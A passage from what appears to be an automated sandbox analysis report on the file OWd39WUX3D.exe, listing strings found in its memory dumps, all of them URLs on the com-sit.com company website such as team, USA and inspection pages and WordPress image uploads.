              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-team/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmensethik/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ursprung/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/usa/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/visual-inspection/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/warenpruefung-lagerung/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-admin/admin-post.php?action=mailpoet_subscription_form
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/4.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/C1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1024x222.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1536x334.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-300x65.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-768x167.png
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-150x150.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-300x300.png
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-150x150.png
